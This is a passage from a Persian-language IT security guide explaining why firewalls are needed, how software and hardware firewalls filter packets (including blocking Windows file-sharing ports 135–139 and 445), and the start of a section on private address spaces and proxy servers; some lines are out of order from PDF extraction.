‫ﺗﻠﻔﻦ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ‪ -‬ﺗﻨﻬﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻋﻤـﻮﻣﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﻫﺮ ﺍﺗﺎﻕ ﺷﻤﺎﺭﺓ ﺩﺍﺧﻠﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ(‪.‬‬
‫•‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻳـﺎ ﺍﺯ ﺁﻥ ﻓﺮﺳـﺘﺎﺩﻩ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﺑﺴﺘﻪ‪ ١١٠‬ﻧﺎﻡ ﺩﺍﺭﻧﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﻛﻠﻤﺎﺕ ‪ TCP‬ﻭ ‪ UDP‬ﺩﺭ ﺑﺤﺚ ﺯﻳـﺮ ﭼـﺸﻢ ﭘﻮﺷـﻲ‬
‫ﻛﻨﻴﺪ ﻭ ﭼﻨﺪﺍﻥ ﻧﮕﺮﺍﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺟﺰﺋﻴﺎﺕ ﻧﺒﺎﺷﻴﺪ‪.‬‬
‫ﭼﺮﺍ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﻴﺎﺯ ﺩﺍﺭﻳﻢ؟‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻴﺴﺖ ﻧﻴﺎﺯﻱ‬
‫ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺪﺍﺭﻳﺪ‪ .‬ﻫﻤﻴﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ ﺍﻳـﻦ‬
‫ﺍﺣﺘﻤــﺎﻝ ﭘﺪﻳــﺪ ﻣــﻲﺁﻳــﺪ ﻛــﻪ ﻣﻬــﺎﺟﻤﻴﻦ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺭﺍ ﻣــﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬
‫•‬
‫ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﭼﺎﭘﮕﺮ ﻳـﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ‬
‫ﻣﺸﺨﺼﻲ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ )ﺩﺭ ﺍﺻﻄﻼﺡ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ‬
‫ﺭﺍﻳﺎﻧــﻪ ﺁﻥ ﭘــﻮﺭﺕ ﺭﺍ "ﻣــﻲﺷــﻨﻮﺩ"(‪ .‬ﺍﮔﺮﭼــﻪ ﺑــﺎ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬
‫‪109 Port Number‬‬
‫‪110 Packet‬‬
‫‪٩٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕـﺮﻱ ﺩﺭ ﻫـﺮ ﻧﻘﻄـﺔ‬
‫ﺩﻧﻴﺎ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ‪.‬‬
‫•‬
‫ﺣﺘﻲ ﺍﮔﺮ ﻧﺘﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻴﭻ ﭘﻮﺭﺗﻲ ﻣﻨﺘﻈـﺮ ﭘﻴـﺎﻡ ﺑﻤﺎﻧﻴـﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻤﭽﻨﺎﻥ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﭘﻴﺎﻣﻬـﺎﻱ ﺯﻳـﺎﺩﻱ‬
‫ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺁﻧﻬـﺎ‬
‫ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ ﺍﻣﺎ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﺒﻜﻪﺍﻱ‬
‫ﺷﻤﺎ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ‬
‫ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﻫﻴــﺪ )ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻓﻘــﻂ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ(‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ‪ ،‬ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ‪ ،‬ﻛـﺮﻡ ﻳـﺎ‬
‫ﺗﺮﺍﻭﺍ ﺁﻟﻮﺩﻩ ﺷﺪﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻮﺭﺩ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺛﺒﺖ ﺷﺪﻩ )ﺍﺯ ﺟﻤﻠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ‬
‫ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺁﻳﺎ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ‬
‫ﻣﻐﺎﻳﺮﺕ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﻮﺩ ﺭﺍﻩ ﻋﺒﻮﺭ ﺑـﺴﺘﻪﻫـﺎ ﻣـﺴﺪﻭﺩ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺳﺨﺖﺍﻓـﺰﺍﺭﻱ ﺑﻬﺘـﺮ‬
‫ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺯﻳﺮ ﭘﻴﺎﺩﻩ ﺷﻮﻧﺪ‪:‬‬
‫•‬
‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ‪،137 ،135‬‬
‫‪ ،139‬ﻭ ‪ TCP/UDP 445‬ﻋﺒــﻮﺭ ﻛﻨــﺪ‪ .‬ﺍﻳــﻦ ﭘﻮﺭﺗﻬــﺎ‬
‫ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺧﺪﻣﺎﺕ‬
‫‪ Windows‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ‪ .‬ﺑـﺎ ﻣﺘﻮﻗـﻒ‬
‫ﺳــﺎﺧﺘﻦ ﺍﻳــﻦ ﺑــﺴﺘﻪﻫــﺎ ﺍﻃﻤﻴﻨــﺎﻥ ﺧﻮﺍﻫﻴــﺪ ﻳﺎﻓــﺖ ﻛــﻪ‬
‫ﻫﻴﭽﻜﺲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ‪،137 ،135‬‬
‫‪ ،139‬ﻭ ‪ TCP/UDP 445‬ﻋﺒــﻮﺭ ﻛﻨــﺪ‪ ،‬ﻣﮕــﺮ ﺁﻧﻜــﻪ‬
‫•‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻧﻲ ﻛـﻪ ﺑـﻪ‬
‫ﺷﺒﻜﻪ ﺁﺳﻴﺐ ﻧﻤﻲﺭﺳﺎﻧﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺗﻌﺮﻳـﻒ‬
‫ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻄﻤﺌﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺎ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ‬
‫ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺳـﺎﻳﺮ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﻴـﺰ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﻏﺎﺯ ﻛﻨﻨﺪﺓ‬
‫ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻨـﺎﺑﻊ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻣﺰﻳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ )ﻫﻤﺮﺍﻩ ﺑﺎ‬
‫ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﺓ ﺁﻥ( ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳـﺎﻝ ﻧﻤـﻮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻗﺒﻞ ﺍﺯ ﻋﺒﻮﺭ ﺩﺍﺩﻥ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺷﻤﺎ‬
‫ﻛﺴﺐ ﺍﺟـﺎﺯﻩ ﻛﻨـﺪ‪ .‬ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖ ﺍﻓـﺰﺍﺭﻱ ﻧﻤـﻲ ﺗﻮﺍﻧـﺪ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﺑﺮﻧﺎﻣﻪ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺷﺪﻩ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻗﺴﻤﺖ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ‬
‫ﺍﺳﺖ‪ ،‬ﺳﺮﻋﺖ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﭘﺎﻳﻴﻦ ﻧﻤﻲﺁﻭﺭﺩ‪.‬‬
‫ﺍﮔﺮ ﺩﺍﺭﺍﻱ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻫﺴﺘﻴﺪ‬
‫ﻣــﺸﺎﺑﻪ ﺗﻤــﺎﻣﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﻳﮕــﺮ ﺑﺎﻳــﺪ ﻫﻤﻴــﺸﻪ ﺁﻧــﺮﺍ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪ .‬ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺧﻼﻕ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺑـﻪ ﺭﻭﺯ‬
‫ﺑﻮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫ﻓﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ‬
‫‪١١١‬‬
‫ﻃﺮﺍﺣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺑﺘﺪﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺑﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺩﺳﺘﮕﺎﻩ‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺖ ﻭ ﻟـﺬﺍ ﻫـﺮ‬
‫ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺑـﻪ‬
‫ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺳـﻄﺢ ﭼﻨـﺪﺍﻥ‬
‫ﻣﻄﻠﻮﺏ ﻧﻴﺴﺖ‪ .‬ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﻣﺠﺰﺍ ﺍﺯ ﺑﻘﻴﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺗـﺎ ﻧﺘﻮﺍﻧﻨـﺪ ﺑﻄـﻮﺭ‬
‫ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳـﺎﻳﺮ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺭﺗﺒـﺎﻁ ﺩﺍﺷـﺘﻪ‬
‫‪111 Private Address Spaces‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫•‬
‫ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺑـﻪ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺑﺎﻳﺴﺘﻴﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ‪ ،‬ﺷﺨﺼﻲ‬
‫ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺎﻡ ﻣﺎﻫﺮﺍﻧـﻪﺍﻱ ﺑﻔﺮﺳـﺘﺪ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳـﻖ‬
‫ﺍﻋﻤﺎﻝ ﻣﺨﺮﺑﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺒﺪﺃ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎﺷـﺪ‬
‫ﻛﻪ ﺷﻤﺎ ﻣﺎﻳﻠﻴﺪ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪٩٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺮﺧﻲ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫•‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ ‪ proxy‬ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻋﺎﺩﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﺮﺍﻱ‬
‫ﻛﻨﺘﺮﻝ ﻧﻮﻉ ﺗﺮﺍﻓﻴﻚ ﻋﺒﻮﺭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻳﺎ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﻛﺎﺭﺑﺮ ﻭ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ proxy‬ﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳـﺖﺷـﺪﻩ ﺭﺍ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛـﺎﺭﺑﺮ ﺩﻳﮕـﺮﻱ ﻫﻤـﺎﻥ‬
‫ﺻﻔﺤﻪ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﺪﻩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻭﻱ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻣـﻮﺭﺩ‬
‫ﻧﻴﺎﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ‪ .‬ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ ‪caching‬‬
‫ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺧﺘـﺼﺎﺹ‬
‫ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﻪ ﺗﻌﺪﺍﺩ ﻛـﺎﻓﻲ‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑـﻪ ﻫﻤـﺔ ﻣﺎﺷـﻴﻨﻬﺎ‬
‫ﺍﺧﺘﺼﺎﺹ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﻏﻠﺐ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻠـﻲ ﭼﻨـﺪ ﺳـﺎﻝ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﻳﺠﺎﺩ ﺷﺒﻜﻪ ﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪.‬‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﺸﺨـﺼﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻮﺭﺩ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﻗــﺮﺍﺭ ﻧﻤــﻲﮔﻴﺮﻧــﺪ‪ .‬ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎ "ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺩﻭ ﻣﻮﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ‬
‫ﺑﻜﺎﺭ ﺭﻭﻧـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻓـﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺼﻮﺭﺕ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒـﺎﻁ‬
